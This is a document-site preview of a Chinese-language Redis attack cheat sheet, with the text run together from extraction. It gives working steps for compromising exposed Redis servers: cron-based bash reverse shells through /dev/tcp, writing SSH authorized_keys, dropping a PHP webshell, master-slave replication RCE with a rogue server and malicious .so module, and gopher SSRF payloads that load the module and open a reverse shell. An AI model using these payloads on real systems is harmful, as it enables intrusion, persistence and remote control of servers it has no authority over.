redis攻防redis利用总结_第1页
redis攻防redis利用总结_第2页
redis攻防redis利用总结_第3页
redis攻防redis利用总结_第4页
redis攻防redis利用总结_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

PAGE1redis利用总结主讲moonsec利用计划任务反弹shell/Fly_hps/article/details/102690282centos成功ubuntu失败setxx"\n*****bash-i>&/dev/tcp/13/99990>&1\n"configsetdir/var/spool/cron/configsetdbfilenamerootsaveecho-e"\n\n*/1****/bin/bash-i>&/dev/tcp//12340>&1\n\n"|redis-cli-h29-xset1

redis-cli-h29configsetdir/var/spool/cron/

redis-cli-h29configsetdbfilenameroot

redis-cli-h29save redis密钥登录ssh生成密钥公钥ssh-keygen-trsa防止乱码导出key(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>key.txt导入内容catkey.txt|redis-cli-h08--passpass123-xsetxxx--pass是登录密码无密码可不填设置路径configsetdir/root/.ssh设置文件名configsetdbfilenameauthorized_keys保存savessh登录ssh-iid_rsaroot@08redis写webshell08:6379>configsetdir/var/www/html/08:6379>configsetdbfilenameshell.php08:6379>setx"<?phpphpinfo();?>"08:6379>save利用主从复制RCE漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。受害人就是从机so文件攻击者就是主机so文件工具下载/n0b0dyCN/redis-rogue-server/Testzero-wz/Awsome-Redis-Rogue-Serverpython3redis-rogue-server.py--rhost09--lhost45反弹shell监听端口nc-lvnp9999如果遇上带密码的改一下脚本就可以了。ssrfredis反弹shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquitgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252019%252021000%250d%250aquit导入模块gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit关闭主从gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit设置数据库名gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit反弹shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%252019%25206666%250d%250aquit本地redis主从复制RCE反弹shellkali命令nc-lvnp2333python3redis_rogue_server.py-v-pathexp.soubuntu上操作configsetdir/tmpconfigsetdbfilenameexp.soslaveof1921000moduleload./exp.soslaveofNOONEsystem.rev192333

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论